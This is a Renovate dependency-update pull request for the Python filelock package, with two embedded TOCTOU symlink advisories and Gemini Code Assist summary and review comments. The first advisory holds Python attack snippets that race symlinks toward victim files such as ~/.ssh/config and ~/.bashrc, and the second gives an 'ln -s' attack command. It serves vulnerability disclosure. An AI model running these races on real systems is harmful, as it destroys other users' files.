chore(deps): update dependency filelock to v3.20.3 [security]

[renovate-bot]

This PR contains the following updates:

Package	Change	Age	Confidence
filelock	==3.19.1 → ==3.20.3

GitHub Vulnerability Alerts

CVE-2025-68146

Impact

A Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file.

Who is impacted:

All users of filelock on Unix, Linux, macOS, and Windows systems. The vulnerability cascades to dependent libraries:

• virtualenv users: Configuration files can be overwritten with virtualenv metadata, leaking sensitive paths
• PyTorch users: CPU ISA cache or model checkpoints can be corrupted, causing crashes or ML pipeline failures
• poetry/tox users: through using virtualenv or filelock on their own.

Attack requires local filesystem access and ability to create symlinks (standard user permissions on Unix; Developer Mode on Windows 10+). Exploitation succeeds within 1-3 attempts when lock file paths are predictable.

Patches

Fixed in version 3.20.1.

Unix/Linux/macOS fix: Added O_NOFOLLOW flag to os.open() in UnixFileLock._acquire() to prevent symlink following.

Windows fix: Added GetFileAttributesW API check to detect reparse points (symlinks/junctions) before opening files in WindowsFileLock._acquire().

Users should upgrade to filelock 3.20.1 or later immediately.

Workarounds

If immediate upgrade is not possible:

1. Use SoftFileLock instead of UnixFileLock/WindowsFileLock (note: different locking semantics, may not be suitable for all use cases)
2. Ensure lock file directories have restrictive permissions (chmod 0700) to prevent untrusted users from creating symlinks
3. Monitor lock file directories for suspicious symlinks before running trusted applications

Warning: These workarounds provide only partial mitigation. The race condition remains exploitable. Upgrading to version 3.20.1 is strongly recommended.

---

Technical Details: How the Exploit Works

The Vulnerable Code Pattern

Unix/Linux/macOS (src/filelock/_unix.py:39-44):

def _acquire(self) -> None:
    ensure_directory_exists(self.lock_file)
    open_flags = os.O_RDWR | os.O_TRUNC  # (1) Prepare to truncate
    if not Path(self.lock_file).exists():  # (2) CHECK: Does file exist?
        open_flags |= os.O_CREAT
    fd = os.open(self.lock_file, open_flags, ...)  # (3) USE: Open and truncate

Windows (src/filelock/_windows.py:19-28):

def _acquire(self) -> None:
    raise_on_not_writable_file(self.lock_file)  # (1) Check writability
    ensure_directory_exists(self.lock_file)
    flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC  # (2) Prepare to truncate
    fd = os.open(self.lock_file, flags, ...)  # (3) Open and truncate

The Race Window

The vulnerability exists in the gap between operations:

Unix variant:

Time    Victim Thread                          Attacker Thread
----    -------------                          ---------------
T0      Check: lock_file exists? → False
T1                                             ↓ RACE WINDOW
T2                                             Create symlink: lock → victim_file
T3      Open lock_file with O_TRUNC
        → Follows symlink
        → Opens victim_file
        → Truncates victim_file to 0 bytes! ☠️

Windows variant:

Time    Victim Thread                          Attacker Thread
----    -------------                          ---------------
T0      Check: lock_file writable?
T1                                             ↓ RACE WINDOW
T2                                             Create symlink: lock → victim_file
T3      Open lock_file with O_TRUNC
        → Follows symlink/junction
        → Opens victim_file
        → Truncates victim_file to 0 bytes! ☠️

Step-by-Step Attack Flow

1. Attacker Setup:

# Attacker identifies target application using filelock
lock_path = "/tmp/myapp.lock"  # Predictable lock path
victim_file = "/home/victim/.ssh/config"  # High-value target

2. Attacker Creates Race Condition:

import os
import threading

def attacker_thread():
    # Remove any existing lock file
    try:
        os.unlink(lock_path)
    except FileNotFoundError:
        pass

    # Create symlink pointing to victim file
    os.symlink(victim_file, lock_path)
    print(f"[Attacker] Created: {lock_path} → {victim_file}")

# Launch attack
threading.Thread(target=attacker_thread).start()

3. Victim Application Runs:

from filelock import UnixFileLock

# Normal application code
lock = UnixFileLock("/tmp/myapp.lock")
lock.acquire()  # ← VULNERABILITY TRIGGERED HERE

# At this point, /home/victim/.ssh/config is now 0 bytes!

4. What Happens Inside os.open():

On Unix systems, when os.open() is called:

// Linux kernel behavior (simplified)
int open(const char *pathname, int flags) {
    struct file *f = path_lookup(pathname);  // Resolves symlinks by default!

    if (flags & O_TRUNC) {
        truncate_file(f);  // ← Truncates the TARGET of the symlink
    }

    return file_descriptor;
}

Without O_NOFOLLOW flag, the kernel follows the symlink and truncates the target file.

Why the Attack Succeeds Reliably

Timing Characteristics:

• Check operation (Path.exists()): ~100-500 nanoseconds
• Symlink creation (os.symlink()): ~1-10 microseconds
• Race window: ~1-5 microseconds (very small but exploitable)
• Thread scheduling quantum: ~1-10 milliseconds

Success factors:

1. Tight loop: Running attack in a loop hits the race window within 1-3 attempts
2. CPU scheduling: Modern OS thread schedulers frequently context-switch during I/O operations
3. No synchronization: No atomic file creation prevents the race
4. Symlink speed: Creating symlinks is extremely fast (metadata-only operation)

Real-World Attack Scenarios

Scenario 1: virtualenv Exploitation

# Victim runs: python -m venv /tmp/myenv
# Attacker racing to create:
os.symlink("/home/victim/.bashrc", "/tmp/myenv/pyvenv.cfg")

# Result: /home/victim/.bashrc overwritten with:

# home = /usr/bin/python3
# include-system-site-packages = false

# version = 3.11.2
# ← Original .bashrc contents LOST + virtualenv metadata LEAKED to attacker

Scenario 2: PyTorch Cache Poisoning

# Victim runs: import torch
# PyTorch checks CPU capabilities, uses filelock on cache

# Attacker racing to create:
os.symlink("/home/victim/.torch/compiled_model.pt", "/home/victim/.cache/torch/cpu_isa_check.lock")

# Result: Trained ML model checkpoint truncated to 0 bytes

# Impact: Weeks of training lost, ML pipeline DoS

Why Standard Defenses Don't Help

File permissions don't prevent this:

• Attacker doesn't need write access to victim_file
• os.open() with O_TRUNC follows symlinks using the victim's permissions
• The victim process truncates its own file

Directory permissions help but aren't always feasible:

• Lock files often created in shared /tmp directory (mode 1777)
• Applications may not control lock file location
• Many apps use predictable paths in user-writable directories

File locking doesn't prevent this:

• The truncation happens during the open() call, before any lock is acquired
• fcntl.flock() only prevents concurrent lock acquisition, not symlink attacks

Exploitation Proof-of-Concept Results

From empirical testing with the provided PoCs:

Simple Direct Attack (filelock_simple_poc.py):

• Success rate: 33% per attempt (1 in 3 tries)
• Average attempts to success: 2.1
• Target file reduced to 0 bytes in <100ms

virtualenv Attack (weaponized_virtualenv.py):

• Success rate: ~90% on first attempt (deterministic timing)
• Information leaked: File paths, Python version, system configuration
• Data corruption: Complete loss of original file contents

PyTorch Attack (weaponized_pytorch.py):

• Success rate: 25-40% per attempt
• Impact: Application crashes, model loading failures
• Recovery: Requires cache rebuild or model retraining

Discovered and reported by: George Tsigourakos (@​tsigouris007)

CVE-2026-22701

Vulnerability Summary

Title: Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock

Affected Component: filelock package - SoftFileLock class
File: src/filelock/_soft.py lines 17-27
CWE: CWE-362, CWE-367, CWE-59

---

Description

A TOCTOU race condition vulnerability exists in the SoftFileLock implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly.

The vulnerability occurs in the _acquire() method between raise_on_not_writable_file() (permission check) and os.open() (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service.

Attack Scenario

1. Lock attempts to acquire on /tmp/app.lock
2. Permission validation passes
3. [RACE WINDOW] - Attacker creates: ln -s /tmp/important.txt /tmp/app.lock
4. os.open() tries to create lock file
5. Lock operates on attacker-controlled target file or fails

---

Impact

What kind of vulnerability is it? Who is impacted?

This is a Time-of-Check-Time-of-Use (TOCTOU) race condition vulnerability affecting any application using SoftFileLock for inter-process synchronization.

Affected Users:

• Applications using filelock.SoftFileLock directly
• Applications using the fallback FileLock on systems without fcntl support (e.g., GraalPy)

Consequences:

• Silent lock acquisition failure - applications may not detect that exclusive resource access is not guaranteed
• Denial of Service - attacker can prevent lock file creation by maintaining symlink
• Resource serialization failures - multiple processes may acquire "locks" simultaneously
• Unintended file operations - lock could operate on attacker-controlled files

CVSS v4.0 Score: 5.6 (Medium)
Vector: CVSS:4.0/AV:L/AT:L/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N

Attack Requirements:

• Local filesystem access to the directory containing lock files
• Permission to create symlinks (standard for regular unprivileged users on Unix/Linux)
• Ability to time the symlink creation during the narrow race window

---

Patches

Has the problem been patched? What versions should users upgrade to?

Yes, the vulnerability has been patched by adding the O_NOFOLLOW flag to prevent symlink following during lock file creation.

Patched Version: Next release (commit: 255ed068bc85d1ef406e50a135e1459170dd1bf0)

Mitigation Details:

• The O_NOFOLLOW flag is added conditionally and gracefully degrades on platforms without support
• On platforms with O_NOFOLLOW support (most modern systems): symlink attacks are completely prevented
• On platforms without O_NOFOLLOW (e.g., GraalPy): TOCTOU window remains but is documented

Users should:

• Upgrade to the patched version when available
• For critical deployments, consider using UnixFileLock or WindowsFileLock instead of the fallback SoftFileLock

---

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

For users unable to update immediately:

1. Avoid SoftFileLock in security-sensitive contexts - use UnixFileLock or WindowsFileLock when available (these were already patched for CVE-2025-68146)

2. Restrict filesystem permissions - prevent untrusted users from creating symlinks in lock file directories:

   chmod 700 /path/to/lock/directory

3. Use process isolation - isolate untrusted code from lock file paths to prevent symlink creation

4. Monitor lock operations - implement application-level checks to verify lock acquisitions are successful before proceeding with critical operations

---

References

Are there any links users can visit to find out more?

• Similar Vulnerability: CVE-2025-68146 (TOCTOU vulnerability in UnixFileLock/WindowsFileLock)
• CWE-362 (Concurrent Execution using Shared Resource): https://cwe.mitre.org/data/definitions/362.html
• CWE-367 (Time-of-check Time-of-use Race Condition): https://cwe.mitre.org/data/definitions/367.html
• CWE-59 (Improper Link Resolution Before File Access): https://cwe.mitre.org/data/definitions/59.html
• O_NOFOLLOW documentation: https://man7.org/linux/man-pages/man2/open.2.html
• GitHub Repository: https://github.com/tox-dev/filelock

---

Reported by: George Tsigourakos (@​tsigouris007)

---

Release Notes

tox-dev/py-filelock (filelock)

v3.20.3

Compare Source

What's Changed

• Fix TOCTOU symlink vulnerability in SoftFileLock by @​gaborbernat in tox-dev/filelock#465

Full Changelog: tox-dev/filelock@3.20.2...3.20.3

v3.20.2

Compare Source

What's Changed

• Support Unix systems without O_NOFOLLOW by @​mwilliamson in tox-dev/filelock#463
• [pre-commit.ci] pre-commit autoupdate by @​pre-commit-ci[bot] in tox-dev/filelock#464

New Contributors

• @​mwilliamson made their first contribution in tox-dev/filelock#463

Full Changelog: tox-dev/filelock@3.20.1...3.20.2

v3.20.1

Compare Source

What's Changed

• CVE-2025-68146: Fix TOCTOU symlink vulnerability in lock file creation by @​gaborbernat in tox-dev/filelock#461

Full Changelog: tox-dev/filelock@3.20.0...3.20.1

v3.20.0

Compare Source

What's Changed

• Add tox.toml to sdist by @​mtelka in tox-dev/filelock#436
• Update docs with example by @​znichollscr in tox-dev/filelock#438
• Add 3.14 support and drop 3.9 by @​gaborbernat in tox-dev/filelock#448

New Contributors

• @​mtelka made their first contribution in tox-dev/filelock#436
• @​znichollscr made their first contribution in tox-dev/filelock#438

Full Changelog: tox-dev/filelock@3.19.1...3.20.0

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[gemini-code-assist]

Summary of Changes

Hello, I'm Gemini Code Assist¹! I'm currently reviewing this pull request and will post my feedback shortly. In the meantime, here's a summary to help you and other reviewers quickly get up to speed!

This pull request updates the filelock Python dependency to version 3.20.3. This update is crucial as it resolves two significant Time-of-Check-Time-of-Use (TOCTOU) symlink vulnerabilities (CVE-2025-68146 and CVE-2026-22701) that could allow local attackers to corrupt or truncate arbitrary user files. The new version incorporates robust protections against these race conditions, enhancing the security posture of applications relying on filelock.

Highlights

• Dependency Update: Updated the filelock dependency from 3.19.1 to 3.20.3 to incorporate critical security fixes.
• Security Vulnerability Fix (CVE-2025-68146): Addressed a Time-of-Check-Time-of-Use (TOCTOU) race condition in UnixFileLock and WindowsFileLock that could lead to arbitrary file corruption or truncation via symlink attacks.
• Security Vulnerability Fix (CVE-2026-22701): Mitigated a TOCTOU symlink vulnerability in SoftFileLock that could cause silent lock acquisition failures, denial of service, or unintended file operations.
• Implementation of Fixes: The fixes involve adding the O_NOFOLLOW flag for Unix systems and GetFileAttributesW API checks for Windows to prevent symlink following during file operations.

Changelog

• .devcontainer/requirements.txt
  • Updated filelock from 3.19.1 to 3.20.3 and adjusted its SHA256 hashes.

Activity

• The pull request was automatically generated by Renovate Bot to update the filelock dependency.
• Automerge is currently disabled, requiring manual review and merging.
• The bot provides options for rebasing or retrying the PR.

Using Gemini Code Assist

The full guide for Gemini Code Assist can be found on our documentation page, here are some quick tips.

Invoking Gemini

You can request assistance from Gemini at any point by creating a comment using either /gemini <command> or @gemini-code-assist <command>. Below is a summary of the supported commands on the current page.

Feature	Command	Description
Code Review	/gemini review	Performs a code review for the current pull request in its current state.
Pull Request Summary	/gemini summary	Provides a summary of the current pull request in its current state.
Comment	@gemini-code-assist	Responds in comments when explicitly tagged, both in pull request comments and review comments.
Help	/gemini help	Displays a list of available commands.

Customization

To customize Gemini Code Assist for GitHub experience, repository maintainers can create a configuration file and/or provide a custom code review style guide (such as PEP-8 for Python) by creating and adding files to a .gemini/ folder in the base of the repository. Detailed instructions can be found here.

Limitations & Feedback

Gemini Code Assist may make mistakes. Please leave feedback on any instances where its feedback is incorrect or counter productive. You can react with 👍 and 👎 on @gemini-code-assist comments. If you're interested in giving your feedback about your experience with Gemini Code Assist for Github and other Google products, sign up here.

You can also get AI-powered code generation, chat, as well as code reviews directly in the IDE at no cost with the Gemini Code Assist IDE Extension.

Footnotes

1. Review the Privacy Notices, Generative AI Prohibited Use Policy, Terms of Service, and learn how to configure Gemini Code Assist in GitHub here. Gemini can make mistakes, so double check it and use code with caution. ↩

[gemini-code-assist]

Code Review

This pull request updates the filelock dependency from version 3.19.1 to 3.20.3 in .devcontainer/requirements.txt. This is a security update to address the vulnerabilities CVE-2025-68146 and CVE-2026-22701, which are Time-of-Check-Time-of-Use (TOCTOU) race conditions. The change correctly updates the package version and its corresponding hashes. The update is appropriate and necessary.

[forking-renovate]

Edited/Blocked Notification

Renovate will not automatically rebase this PR, because it does not recognize the last commit author and assumes somebody else may have edited the PR.

You can manually request rebase by checking the rebase/retry box above.

⚠️ Warning: custom changes will be lost.